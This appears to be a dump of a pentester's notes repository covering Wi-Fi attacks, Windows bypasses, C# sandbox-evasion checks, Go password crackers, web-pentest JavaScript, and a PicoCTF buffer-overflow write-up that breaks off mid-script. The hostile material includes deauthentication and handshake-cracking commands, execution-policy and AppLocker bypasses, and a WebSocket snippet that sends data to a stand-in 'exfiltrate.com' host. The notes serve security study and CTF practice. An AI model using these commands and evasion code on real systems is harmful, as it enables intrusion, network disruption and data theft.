61 | 
62 | The possibility of attacks via the Wi-Fi Protected Setup (WPS), is still high in the current WPA2-capable access points
63 | 
64 | ## WPA3 - Wi-Fi Protected Access v3
65 | 
66 | **Improvements :**
67 | 
68 | - WPA3 will protect against dictionary attacks by implementing a new key exchange protocol. WPA2 used an imperfect four-way handshake between clients and access points to enable encrypted connections.
69 | - If your passphrase gets compromised : WPA3 supports forward secrecy, meaning that any traffic that came across your transom before an outsider gained access will remain encrypted. With WPA2, they can decrypt old traffic as well.
70 | 
71 | ## Secure your Wi-Fi
72 | 
73 | - Try to use WPA2/WPA3 instead of WPA and WEP (WEP is very insecure).
74 | - Use a strong password (up to 63 characters for WPA/WPA2)
75 | - Deactivate Wi-Fi Protected Setup (WPS) on WPA/WPA2
76 | 
77 | ## References
78 | 
79 | - [NetSpotApp.com - Wifi Encryption And Security](https://www.netspotapp.com/blog/wifi-security/wifi-encryption-and-security.html)
80 | - [TechTarget.com - WEP](https://www.techtarget.com/searchsecurity/definition/Wired-Equivalent-Privacy)


--------------------------------------------------------------------------------
/docs/pentest/wifi/03-channels.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Wi-Fi channels
 3 | description: Wi-Fi channels
 4 | ---
 5 | 
 6 | # Wi-Fi Channels
 7 | 
 8 | ## Introduction
 9 | 
10 | Common frequency bands : 2.4 GHz, 3.6 GHz, 4.9 GHz, 5 GHz, and 5.9 GHz
11 | 
12 | ![WiFi channels](https://www.netspotapp.com/images/upload/screens/channels/channels.jpg)
13 | 
14 | All Wi-Fi versions through 802.11n (a, b, g, n) work between the channel frequencies of 2400 and 2500 MHz. These 100 MHz in between are split in 14 channels 20 MHz each. As a result, each 2.4GHz channel overlaps with two to four other channels (see diagram above). Overlapping makes wireless network throughput quite poor.
15 | 
16 | Common channels for 2.4 GHz : 1, 6 and 11 (to avoid overlapping)
17 | 
18 | ---
19 | 
20 | - **2.4 GHz** : This band provides coverage at a longer range but transmits data at slower speeds.
21 | - **5 GHz** : On the other hand, the 5 GHz band provides less coverage but transmits data at faster speeds.
22 | 
23 | ## Compability
24 | 
25 | - **802.11n** : Set of LAN protocols that can be used in the 2.4 GHz or 5 GHz frequency bands.
26 | - **802.11ac** : Extended channel binding from 40 MHz in 802.11n to optional 160 MHz and mandatory 80 MHz channel bandwidth for stations.
27 | - **802.11ax** : All band spectrums between 1 and 7 GHz.
28 | 
29 | ## List frequencies and channels
30 | 
31 | ```bash
32 | $ ip a
33 | ...
34 | 4: wlp0s20f3: <BROADCAST,MULTICAST,UP,LOWER_UP>...
35 | ...
36 | $ sudo iwlist wlp0s20f3 scan | grep Frequency | sort | uniq -c | sort -n
37 |       1                     Frequency:5.745 GHz
38 |       2                     Frequency:2.412 GHz (Channel 1)
39 |       3                     Frequency:5.18 GHz (Channel 36)
40 |       3                     Frequency:5.5 GHz (Channel 100)
41 |       3                     Frequency:5.66 GHz (Channel 132)
42 | ```
43 | 
44 | ## References
45 | 
46 | - [NetSpotApp.com - Wifi channel](https://www.netspotapp.com/wifi-channel-scanner/)


--------------------------------------------------------------------------------
/docs/pentest/wifi/10-exploitation.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Wi-Fi Exploitation
 3 | description: Wi-Fi exploitation cheatsheet.
 4 | ---
 5 | 
 6 | # TODO
 7 | 
 8 | ## DeAuth
 9 | 
10 | **Tools :**
11 | 
12 | - aircrack-ng (suite)
13 | - MDK3
14 | - bettercap
15 | - Scapy
16 | - ...
17 | 
18 | ```bash
19 | aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c yy:yy:yy:yy:yy:yy wlan0
20 | ```
21 | 
22 | 1.  `-0` arms deauthentication attack mode
23 | 2.  `1` is the number of deauths to send; use 0 for infinite deauths
24 | 3.  `-a xx:xx:xx:xx:xx:xx` is the AP (access point) MAC (Media Access Control) address
25 | 4.  `-c yy:yy:yy:yy:yy:yy` is the target client MAC address; omit to deauthenticate all clients on AP
26 | 5.  `wlan0` is the NIC (Network Interface Card)
27 | 
28 | ### Cracking Handshakes
29 | 
30 | #### John
31 | 
32 | #### Hashcat
33 | 
34 | ### aircrack-ng
35 | 
36 | ```bash
37 | $ aircrack-ng XX-XX-XX-XX-XX-XX_full.pcap -w /opt/SecLists/Passwords/WiFi-WPA/probable-v2-wpa-top4800.txt
38 | ```


--------------------------------------------------------------------------------
/docs/pentest/windows.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Windows
 3 | description: Windows basic.
 4 | ---
 5 | 
 6 | # Windows
 7 | 
 8 | ## PowerShell's execution policy
 9 | 
10 | [PowerShell's execution policy](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies) is a safety feature that controls the conditions under which PowerShell loads configuration files and runs scripts. This feature helps prevent the execution of malicious scripts.
11 | 
12 | Load a powershell shell with execution policy bypassed :
13 | 
14 | ```powershell
15 | C:\> powershell -ep bypass
16 | ```
17 | 
18 | ## Registry
19 | 
20 | ### Edit key
21 | 
22 | To fix the following error, you need to set `AllowInsecureGuestAuth`, located in `HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters`, to `1`.
23 | 
24 | ```powershell
25 | PS C:\Users\Administrator> copy .\20220219102531_loot.zip \\10.9.52.138\tmpshare\loot.zip
26 | copy : You can't access this shared folder because your organization's security policies block unauthenticated guest access. These
27 | policies help protect your PC from unsafe or malicious devices on the network.
28 | At line:1 char:1
29 | + copy .\20220219102531_loot.zip \\10.9.52.138\tmpshare\loot.zip
30 | + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
31 |     + CategoryInfo          : NotSpecified: (:) [Copy-Item], IOException
32 |     + FullyQualifiedErrorId : System.IO.IOException,Microsoft.PowerShell.Commands.CopyItemCommand
33 | ```
34 | 
35 | You can do it with powershell :
36 | 
37 | ```powershell
38 | PS C:\Users\Administrator> Set-Itemproperty -path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters' -Name 'AllowInsecureGuestAuth' -value 1
39 | ```
40 | 
41 | ## Bypass AppLocker
42 | 
43 | If `AppLocker` is configured with default AppLocker rules, we can bypass it by placing our executable in the following directory: `C:\Windows\System32\spool\drivers\color` (whitelisted by default).
44 | 
45 | ## Powershell history
46 | 
47 | - ConsoleHost_history : `%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt`
48 | 


--------------------------------------------------------------------------------
/docs/programming/charp/02-csharp-evasion.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Sandbox evasion
 3 | description: Introduction to C# sandbox evasion
 4 | ---
 5 | 
 6 | # Sandbox Evasion
 7 | 
 8 | ## Sleep
 9 | 
10 | ```csharp
11 | /**
12 | * Sleep for a certain amounts of seconds.
13 | */
14 | private void Sleep(int seconds)
15 | {
16 |     Thread.Sleep(seconds * 1000);
17 | }
18 | ```
19 | 
20 | ## Mouse is moving
21 | 
22 | ```csharp
23 | using System.Runtime.InteropServices;
24 | 
25 | // ...
26 | 
27 | [DllImport("user32.dll")]
28 | static extern bool GetCursorPos(out Point lpPoint);
29 | 
30 | public Point GetMousePosition()
31 | {
32 |     GetCursorPos(out Point lpPoint);
33 |     return lpPoint;
34 | }
35 | 
36 | [StructLayout(LayoutKind.Sequential)]
37 | public struct Point
38 | {
39 |     public int X;
40 |     public int Y;
41 | }
42 | 
43 | /**
44 | * Exit the program if the position of the mouse has not changed in 30 seconds.
45 | */
46 | public void CheckMouseIsMoving()
47 | {
48 |     Point mousePosition = this.GetMousePosition();
49 |     this.Sleep(30);
50 |     Point newMousePosition = this.GetMousePosition();
51 | 
52 |     if (mousePosition.X == newMousePosition.X &&
53 |         mousePosition.Y == newMousePosition.Y) Environment.Exit(1337);
54 | }
55 | ```
56 | 
57 | ## Numbers of CPUs
58 | 
59 | ```csharp
60 | /**
61 | * Exit the program if the number of CPU is below or equals to 2.
62 | */
63 | public void CheckCPUCount()
64 | {
65 |     if (Environment.ProcessorCount <= 2) Environment.Exit(1337);
66 | }
67 | ```
68 | 
69 | 
70 | ## Presence of Debugger
71 | 
72 | ```csharp
73 | using System.Diagnostics;
74 | 
75 | // ...
76 | 
77 | /**
78 | * Exit the program if a debugger is attached to the process.
79 | */
80 | public void CheckDebugger()
81 | {
82 |     if (Debugger.IsAttached) Environment.Exit(1337);
83 | }
84 | ```
85 | 
86 | ## Uptime
87 | 
88 | ```csharp
89 | /**
90 | *  Exit the program if the uptime is less than 15 minutes.
91 | */
92 | public void CheckUptime()
93 | {
94 |     int uptime = (Environment.TickCount & Int32.MaxValue) / 1000;
95 |     if (uptime / 60 < 15) Environment.Exit(1337);
96 | }
97 | ```
98 | 


--------------------------------------------------------------------------------
/docs/programming/charp/index.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Introduction to C#
 3 | description: Introduction to C#
 4 | ---
 5 | 
 6 | # Introduction to C\#
 7 | 
 8 | ## Definition
 9 | 
10 | C# (pronounced "C-sharp") is a modern, object-oriented programming language developed by Microsoft. It was first released in 2000 as part of the .NET framework, and it is designed to be used for building a wide range of applications, from simple command-line programs to complex, enterprise-level applications. C# is a type-safe, managed language, meaning that the runtime environment automatically handles memory management and other low-level details, allowing developers to focus on writing code. C# is a statically-typed language, meaning that types are checked at compile-time rather than at runtime. This makes C# programs more efficient and less prone to runtime errors.
11 | 
12 | ## Build
13 | 
14 | ### Windows
15 | 
16 | To build dotnet project you need to install [Visual Studio](https://visualstudio.microsoft.com/).
17 | 
18 | MSDN :
19 | 
20 | - [Single-file deployment and executable](https://learn.microsoft.com/en-us/dotnet/core/deploying/single-file/overview?tabs=cli)
21 | - [Trimming options](https://learn.microsoft.com/en-us/dotnet/core/deploying/trimming/trimming-options)
22 | 
23 | Command to generate a [self-contained](https://learn.microsoft.com/en-us/dotnet/core/deploying/deploy-with-cli#self-contained-deployment) PE without symbols.
24 | 
25 | ```powershell
26 | dotnet publish -c Release -r win-x64 --self-contained -p:PublishSingleFile=true -p:DebugType=none -p:DebugSymbols=false -p:PublishTrimmed=true
27 | ```
28 | 
29 | ### Linux
30 | 
31 | On Linux you can install `mono` which is a .NET compiler and runtime.
32 | 
33 | Arch : `sudo pacman -S mono`
34 | 
35 | Compilation :
36 | 
37 | ```bash
38 | $ vim Main.cs
39 | $ mcs Main.cs
40 | $ file Main.exe
41 | Main.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
42 | ```
43 | 


--------------------------------------------------------------------------------
/docs/programming/go.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | title: Go
  3 | description: Golang example of code snippets.
  4 | ---
  5 | 
  6 | # Golang practical example
  7 | 
  8 | ## Make an HTTP request
  9 | 
 10 | ### GET
 11 | 
 12 | Source (main.go) :
 13 | 
 14 | ```go
 15 | package main
 16 | 
 17 | import (
 18 |     "io/ioutil"
 19 |     "log"
 20 |     "net/http"
 21 |     "flag"
 22 | )
 23 | 
 24 | func getRequest(url string) (string, error) {
 25 |     resp, err := http.Get(url)
 26 | 
 27 |     if err != nil {
 28 |         return "", err
 29 |     }
 30 | 
 31 |     defer resp.Body.Close()
 32 | 
 33 |     body, err := ioutil.ReadAll(resp.Body)
 34 | 
 35 |     if err != nil {
 36 |         return "", err
 37 |     }
 38 | 
 39 |     return string(body), nil
 40 | }
 41 | 
 42 | 
 43 | func main() {
 44 |     var url string
 45 |     flag.StringVar(&url, "url", "https://example.com", "URL to request")
 46 |     flag.Parse()
 47 | 
 48 |     response, err := getRequest(url)
 49 | 
 50 |     if err != nil {
 51 |         log.Fatalln(err)
 52 |     }
 53 | 
 54 |     log.Printf(response)
 55 | }
 56 | ```
 57 | 
 58 | Execution :
 59 | 
 60 | ```bash
 61 | $ python3 -m http.server &
 62 | $ go run main.go -url 'http://localhost:8000'
 63 | 2021/11/08 18:41:02 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
 64 | <html>
 65 | <head>
 66 | ...
 67 | ```
 68 | 
 69 | ## Cryptography
 70 | 
 71 | ### md5
 72 | 
 73 | Source (main.go) :
 74 | 
 75 | ```go
 76 | package main
 77 | 
 78 | import (
 79 |     "crypto/md5"
 80 |     "fmt"
 81 | )
 82 | 
 83 | func main() {
 84 |     buffer := []byte("helloworld")
 85 | 
 86 |     fmt.Printf("%x", md5.Sum(buffer))
 87 | }
 88 | ```
 89 | 
 90 | Execution :
 91 | 
 92 | ```bash
 93 | $ go run main.go
 94 | fc5e038d38a57032085441e7fe7010b0
 95 | ```
 96 | 
 97 | ### Rainbow tables of rockyou (md5)
 98 | 
 99 | Source (main.go) :
100 | 
101 | ```go
102 | package main
103 | 
104 | import (
105 |     "crypto/md5"
106 |     "fmt"
107 |     "bufio"
108 |     "log"
109 |     "os"
110 | )
111 | 
112 | func main() {
113 |     wordlist, err := os.Open("/opt/rockyou.txt")
114 |     if err != nil {
115 |         log.Fatal(err)
116 |     }
117 | 
118 |     defer wordlist.Close()
119 | 
120 |     output, err := os.Create("rockyou.txt.md5")
121 |     if err != nil {
122 |         log.Fatal(err)
123 |     }
124 | 
125 |     defer output.Close()
126 | 
127 |     scanner := bufio.NewScanner(wordlist)
128 |     for scanner.Scan() {
129 |         data := []byte(scanner.Text())
130 |         hash := fmt.Sprintf("%x\n", md5.Sum(data))
131 |         output.WriteString(hash)
132 |     }
133 | 
134 |     if err := scanner.Err(); err != nil {
135 |         log.Fatal(err)
136 |     }
137 | }
138 | ```
139 | 
140 | Execution :
141 | 
142 | ```bash
143 | $ go run main.go
144 | 
145 | # Checking first line
146 | $ cat /opt/rockyou.txt | head -n1 | tr -d '\n' | md5sum ; cat rockyou.txt.md5 | head -n1
147 | e10adc3949ba59abbe56e057f20f883e  -
148 | e10adc3949ba59abbe56e057f20f883e
149 | ```
150 | 
151 | ### Crack sha512-salt password
152 | 
153 | Source code :
154 | 
155 | ```go
156 | package main
157 | 
158 | import (
159 |     "crypto/sha512"
160 |     "fmt"
161 |     "bufio"
162 |     "log"
163 |     "os"
164 | )
165 | 
166 | func hashPassword(password string, salt string) string {
167 |     hash := sha512.Sum512([]byte(password + salt))
168 |     return fmt.Sprintf("%x", hash)
169 | }
170 | 
171 | func verifyPass(hash, salt, password string) bool {
172 |     resultHash := hashPassword(password, salt)
173 |     return resultHash == hash
174 | }
175 | 
176 | func main() {
177 |     hash := "6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed"
178 |     salt := "1c362db832f3f864c8c2fe05f2002a05"
179 | 
180 |     wordlist, err := os.Open("/opt/rockyou.txt")
181 |     if err != nil {
182 |         log.Fatal(err)
183 |     }
184 | 
185 |     defer wordlist.Close()
186 | 
187 |     scanner := bufio.NewScanner(wordlist)
188 |     for scanner.Scan() {
189 |         line := scanner.Text()
190 |         if verifyPass(hash, salt, line) {
191 |             fmt.Println(line)
192 |             break;
193 |         }
194 |     }
195 | }
196 | ```
197 | 
198 | Execution :
199 | 
200 | ```bash
201 | $ go run cracker.go
202 | november16
203 | ```
204 | 


--------------------------------------------------------------------------------
/docs/programming/javascript.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | title: Javascript
  3 | description: Javascript cheatsheets for Web pentester.
  4 | ---
  5 | 
  6 | # Javascript cheatsheets for Web pentester
  7 | 
  8 | ## Making HTTP Requests
  9 | 
 10 | List of forbidden headers : `Accept-Charset`, `Accept-Encoding`, `Access-Control-Request-Headers`, `Access-Control-Request-Method`, `Connection`, `Content-Length`, `Cookie`, `Cookie2`, `Date`, `DNT`, `Expect`, `Host`, `Keep-Alive`, `Origin`, `Referer`, `TE`, `Trailer`, `Transfer-Encoding`, `Upgrade`, `Via`.
 11 | 
 12 | ### Using fetch
 13 | 
 14 | Fetch API is not supported by all browsers, you can detect it by using this snippet :
 15 | 
 16 | ```js
 17 | if (window.fetch) {
 18 |   // run my fetch request here
 19 | } else {
 20 |   // do something with XMLHttpRequest?
 21 | }
 22 | ```
 23 | 
 24 | Exemple of a synchronous GET request :
 25 | 
 26 | ```js
 27 | let response = await fetch('https://api.example.com/users');
 28 | 
 29 | if (response.ok) { // status code : 2XX
 30 |   let json = await response.json();
 31 | } else {
 32 |   console.log("Error: " + response.status);
 33 | }
 34 | ```
 35 | 
 36 | Example of an asynchronous POST request sending and reiceiving JSON data :
 37 | 
 38 | ```js
 39 | fetch('https://api.example.com/users', {
 40 | 	method: 'POST',
 41 | 	headers: {
 42 | 		'Content-Type': 'application/json'
 43 | 	},
 44 | 	body: JSON.stringify({
 45 | 		username: "john",
 46 | 		email: "john@example.com"
 47 | 	})
 48 | })
 49 | .then(response => response.json())
 50 | .then(data => console.log(data))
 51 | .catch(err => console.log(err))
 52 | ```
 53 | 
 54 | Send a request with credentials included on both same-origin and cross-origin calls : `credentials: 'include'`.
 55 | 
 56 | > More information on [javascript.info](https://javascript.info/fetch) and [developer.mozilla.org](https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API/Using_Fetch).
 57 | 
 58 | ### Using XHR (XMLHttpRequest)
 59 | 
 60 | Synchronous HTTP GET request :
 61 | 
 62 | ```js
 63 | let xhr = new XMLHttpRequest();
 64 | xhr.open('GET', 'https://developer.mozilla.org/', false);
 65 | xhr.send();
 66 | 
 67 | if (xhr.status === 200) {
 68 |   console.log(xhr.responseText);
 69 | }
 70 | ```
 71 | 
 72 | Asynchronous HTTP GET request :
 73 | 
 74 | ```js
 75 | let xhr = new XMLHttpRequest();
 76 | xhr.open('GET', 'http://example.com/index.php?param=1');
 77 | 
 78 | xhr.onload = function() {
 79 |   if (xhr.status !== 200) {
 80 |     console.log(`Error ${xhr.status}`);
 81 |   } else {
 82 |     console.log(xhr.response);
 83 |   }
 84 | };
 85 | 
 86 | xhr.send();
 87 | ```
 88 | 
 89 | Asynchronous HTTP POST request with JSON data :
 90 | 
 91 | ```js
 92 | const data = {
 93 |     "id": "17",
 94 |     "email": "john@example.com"
 95 | };
 96 | 
 97 | let xhr = new XMLHttpRequest();
 98 | 
 99 | xhr.open('POST', '/api/users');
100 | xhr.setRequestHeader('Content-Type', 'application/json');
101 | 
102 | xhr.onload = function() {
103 |   if (xhr.status !== 200) {
104 |     console.log(`Error ${xhr.status}`);
105 |   } else {
106 |     console.log(xhr.response);
107 |   }
108 | };
109 | 
110 | xhr.send(JSON.stringify(data));
111 | ```
112 | 
113 | !!! info
114 |   The XMLHttpRequest.withCredentials (`xhr.withCredentials = true;`) property is a boolean value that indicates whether or not cross-site Access-Control requests should be made using credentials such as cookies, authorization headers or TLS client certificates. Setting withCredentials has no effect on same-site requests.
115 | 
116 | > More information on [developer.mozilla.org](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest).
117 | 
118 | ## WebSocket
119 | 
120 | ### Receiving and sending data
121 | 
122 | ```js
123 | let ws = new WebSocket("wss://vulnerable-server.com/chat");
124 | 
125 | ws.onopen = (event) => {
126 |   ws.send("READY")
127 | };
128 | 
129 | ws.onmessage = (event) => {
130 |   fetch('https://exfiltrate.com', {
131 |   	method: 'POST',
132 | 	mode: 'no-cors',
133 | 	headers: {
134 | 		'Content-Type': 'application/json'
135 | 	},
136 |   	body: event.data
137 |   });
138 | }
139 | ```


--------------------------------------------------------------------------------
/docs/programming/powershell.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Powershell
 3 | description: Powershell cheatsheet for pentester.
 4 | ---
 5 | 
 6 | # Powershell
 7 | 
 8 | ## Host discovery
 9 | 
10 | ### Ping scanner
11 | 
12 | ```powershell
13 | PS C:\Windows\system32> for($i=0;$i -lt 30;$i++){ echo "172.16.2.$i :"; (New-Object System.Net.Networkinformation.ping).Send("172.16.2.$i").Status }
14 | 172.16.2.0 :
15 | DestinationHostUnreachable
16 | 172.16.2.1 :
17 | TimedOut
18 | 172.16.2.2 :
19 | DestinationHostUnreachable
20 | 172.16.2.3 :
21 | DestinationHostUnreachable
22 | 172.16.2.4 :
23 | DestinationHostUnreachable
24 | 172.16.2.5 :
25 | Success
26 | [...]
27 | ```


--------------------------------------------------------------------------------
/docs/programming/python/security.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Security
 3 | description: Security warning in Python
 4 | ---
 5 | 
 6 | # Security warning in Python
 7 | 
 8 | ## python2 input eval
 9 | 
10 | The input() function in Python 2.x evaluates things before returning.
11 | 
12 | ### RCE (Remote Code Execution)
13 | 
14 | ```python
15 | >>> input("What's your name ? ")
16 | What's your name ? __import__("os").system("id")
17 | uid=1000(xanhacks) gid=1000(xanhacks) groups=1000(xanhacks),995(audio),998(wheel)
18 | 0
19 | ```
20 | 
21 | ### Bypass check
22 | 
23 | ```python
24 | >>> password = "p@ssw0rd"
25 | >>> value = input("What's is the password ? ")
26 | What's is the password ? password
27 | >>> password == value
28 | True
29 | >>> password
30 | 'p@ssw0rd'
31 | >>> value
32 | 'p@ssw0rd'
33 | ```
34 | 
35 | ### Mitigation using raw_input
36 | 
37 | ```python
38 | >>> password = "p@ssw0rd"
39 | >>> value = raw_input("What's is the password ? ")
40 | What's is the password ? password
41 | >>> password == value
42 | False
43 | >>> password
44 | 'p@ssw0rd'
45 | >>> value
46 | 'password'
47 | ```
48 | 


--------------------------------------------------------------------------------
/docs/pwn/assembly.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Introduction to x86 Assembly
 3 | description: Calling conventions, stacks, insctructions, ...
 4 | ---
 5 | 
 6 | # Introduction to x86 Assembly
 7 | ## Instructions
 8 | 
 9 | ...
10 | 
11 | ## Registers
12 | ...
13 | 
14 | ## Stack
15 | 
16 | ```asm
17 | ebp	; Pointer to the start of the current stack-frame.
18 | esp ; Pointer to the end of the stack
19 | ```
20 | 
21 | ## Functions
22 | 
23 | The function **prologue** is a few lines of code at the beginning of a function, which prepare the stack and registers for use within the function. Similarly, the function **epilogue** appears at the end of the function, and restores the stack and registers to the state they were in before the function was called.
24 | 
25 | > Source [Wikipedia](https://en.wikipedia.org/wiki/Function_prologue_and_epilogue).
26 | 
27 | ### Prologue
28 | 
29 | **Goal :**
30 | 
31 | 1. Pushes current base pointer onto the stack, so it can be restored later.
32 | 2. Assigns the value of base pointer to the address of stack pointer (which is pointed to the top of the stack) so that the base pointer will point to the top of the stack.
33 | 3. Moves the stack pointer further by decreasing or increasing its value, depending on whether the stack grows down or up. On x86, the stack pointer is decreased to make room for the function's local variables.
34 | 
35 | ```asm
36 | push ebp
37 | mov	ebp, esp
38 | sub	esp, N
39 | ```
40 | 
41 | ### Epilogue
42 | 
43 | **Goal :**
44 | 
45 | 1. Drop the stack pointer to the current base pointer, so room reserved in the prologue for local variables is freed.
46 | 2. Pops the base pointer off the stack, so it is restored to its value before the prologue.
47 | 3. Returns to the calling function, by popping the previous frame's program counter off the stack and jumping to it.
48 | 
49 | ```asm
50 | leave
51 | ret
52 | ```
53 | 
54 | `leave` is a shortcut for :
55 | ```asm
56 | mov	esp, ebp
57 | pop	ebp
58 | ```
59 | 
60 | ## Calling conventions
61 | 
62 | ### 64 bits
63 | 
64 | Arguments order : `rdi`, `rsi`, `rdx`, `rcx`, `r8` and `r9`.
65 | 
66 | !!! info
67 |     If there are more than six parameters, then the program’s stack is used to pass in additional parameters to the function.
68 | 
69 | ### 32 bits
70 | 
71 | The program’s stack is used to pass all the parameters to the function.
72 | 
73 | Example with a third arguments function :
74 | 
75 | ```asm
76 | push <third_argument>
77 | push <second_argument>
78 | push <first_argument>
79 | call func
80 | ```
81 | 
82 | 


--------------------------------------------------------------------------------
/docs/pwn/binary-protections.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Binary protections
 3 | description: List of binary protections set up by the compiler or our computer.
 4 | ---
 5 | 
 6 | # Binary protections
 7 | 
 8 | ## Identification
 9 | 
10 | ``` shell
11 | $ checksec BOO_2
12 | [*] '/tmp/BOO_2'
13 |     Arch:     i386-32-little
14 |     RELRO:    Partial RELRO
15 |     Stack:    No canary found
16 |     NX:       NX enabled
17 |     PIE:      No PIE (0x8048000)
18 | ```
19 | 
20 | ## RELRO
21 | 
22 | Relro (Relocation Read only) affects the memory permissions. This is a protection implemented by GCC, allowing to ask the linker to resolve the dynamic library functions at the very beginning of the execution, and thus to be able to remap the GOT section and GOT.plt as read-only.
23 | 
24 | !!! info
25 |     Partial RELRO is enabled by default in GCC.
26 | 
27 | !!! warning
28 |     If your program has a vulnerability that makes it possible to write somewhere in the memory, you can overwrite such address by your own (or replace the address of printf by the address of the function system).
29 | 
30 | ## Canary
31 | 
32 | Stack canaries are random values placed in memory just before the return address.
33 | In order to overwrite the return address and redirect program flow, an attacker would have to overwrite the stack canary as well. And thus the program would be able to detect stack overflow by checking if the canary value is correct.
34 | 
35 | ## NX
36 | 
37 | The NX bit (no-execute) bit may mark certain areas of memory (like the stack) as non-executable. The processor will then refuse to execute any code residing in these areas of memory. It is used to prevent certain types of malicious software from taking over computers by inserting their code into another program's data storage area and running their own code from within this section (like shellcode), one class of such attacks is known as the buffer overflow attack.
38 | 
39 | ## PIE
40 | 
41 | PIE (Position Independent Executable) allows a program to be relocated, just like a shared object. At each run of the program, the program can be loaded at different addresses to make it harder for an attacker to guess certain program state.
42 | 
43 | ## ASLR
44 | 
45 | Address space layout randomization (ASLR) is a computer security technique involved in preventing exploitation of memory corruption vulnerabilities. In order to prevent an attacker from reliably jumping to, for example, a particular exploited function in memory, ASLR randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries.
46 | 
47 | !!! info
48 |     You can disable ASLR on your computer by using this command :<br>
49 |     <strong>echo 0 | sudo tee /proc/sys/kernel/randomize_va_space</strong>
50 | 
51 | ## FORTIFY_SOURCE
52 | 
53 | The GNU Compiler Collection has a FORTIFY_SOURCE option that does automatic bounds checking of dangerous functions to prevent simple buffer overflows. The FORTIFY_SOURCE code will do static and dynamic checks on buffer sizes to prevent these buffer overflows.
54 | 
55 | !!! example
56 |     <strong>gets(buffer)</strong> would be converted to <strong>__gets_chk(buffer, sizeof(buffer))</strong>, then <strong>__gets_chk</strong> would make sure that the input does not exceed <strong>sizeof(buffer)</strong>.
57 | 
58 | ### References
59 | 
60 | - https://blog.usejournal.com/binary-exploitation-buffer-overflows-a9dc63e8b546
61 | - https://en.wikipedia.org/wiki/Position-independent_code
62 | - https://stackoverflow.com/questions/30498776/position-independent-executables-and-android
63 | - https://en.wikipedia.org/wiki/NX_bit
64 | - https://www.root-me.org/fr/Documentation/Applicatif/Memoire-protection-RELRO
65 | - https://guyinatuxedo.github.io/7.2-mitigation_relro/index.html
66 | - https://en.wikipedia.org/wiki/Address_space_layout_randomization
67 | - https://medium.com/@HockeyInJune/fortify-source-semantics-de54ca4bbe12
68 | - https://cotonne.github.io/binary/2020/07/14/format-string.html
69 | 


--------------------------------------------------------------------------------
/docs/pwn/buffer-overflow/01-calling-function-with-args-x64.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | title: Call a function with arguments - 32 bits 
  3 | description: Exploiting a buffer overflow to call a function with specific arguments in 32 bits architecture.
  4 | ---
  5 | 
  6 | # Buffer Overflow - Calling a function with args
  7 | 
  8 | ## Summary
  9 | 
 10 | Exploiting a buffer overflow to call a function with specific arguments.
 11 | 
 12 | ## Challenge
 13 | 
 14 | ### Description
 15 | 
 16 | !!! note ""
 17 |     Challenge : `buffer overflow 2` from PicoCTF 2018.
 18 | 
 19 | Alright, this time you’ll need to control some arguments. Can you get the flag from this program?
 20 | 
 21 | ### Source code
 22 | 
 23 | ```c linenums="1"
 24 | #include <stdio.h>
 25 | #include <stdlib.h>
 26 | #include <string.h>
 27 | #include <unistd.h>
 28 | #include <sys/types.h>
 29 | 
 30 | #define BUFSIZE 100
 31 | #define FLAGSIZE 64
 32 | 
 33 | void win(unsigned int arg1, unsigned int arg2) {
 34 |   char buf[FLAGSIZE];
 35 |   FILE *f = fopen("flag.txt","r");
 36 |   if (f == NULL) {
 37 |     printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
 38 |     exit(0);
 39 |   }
 40 | 
 41 |   fgets(buf,FLAGSIZE,f);
 42 |   if (arg1 != 0xDEADBEEF)
 43 |     return;
 44 |   if (arg2 != 0xDEADC0DE)
 45 |     return;
 46 |   printf(buf);
 47 | }
 48 | 
 49 | void vuln(){
 50 |   char buf[BUFSIZE];
 51 |   gets(buf);
 52 |   puts(buf);
 53 | }
 54 | 
 55 | int main(int argc, char **argv){
 56 | 
 57 |   setvbuf(stdout, NULL, _IONBF, 0);
 58 |   
 59 |   gid_t gid = getegid();
 60 |   setresgid(gid, gid, gid);
 61 | 
 62 |   puts("Please enter your string: ");
 63 |   vuln();
 64 |   return 0;
 65 | }
 66 | ```
 67 | 
 68 | ## Writeup
 69 | 
 70 | ```shell
 71 | $ file vuln
 72 | vuln: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=f2f6cce698b62f5109de9955c0ea0ab832ea967c, not stripped
 73 | ```
 74 | 
 75 | The goal of this challenge is to call the **win** function with the two arguments, **0xDEADBEEF** and **0xDEADC0DE**. As you have probably noticed, the **vuln** function is vulnerable to a buffer overflow attack which allows us to rewrite **EIP** and thus call the **win** function. We can pass it the two required arguments using the stack as we are in 32 bits.
 76 | 
 77 | | Stack          |
 78 | | :------------: |
 79 | | EIP            |
 80 | | Return address |
 81 | | Argument n°1   |
 82 | | Argument n°2   |
 83 | | ...            |
 84 | 
 85 | ```python linenums="1"
 86 | #!/usr/bin/env python3
 87 | from pwn import process, p32, ELF
 88 | 
 89 | # Run the binary
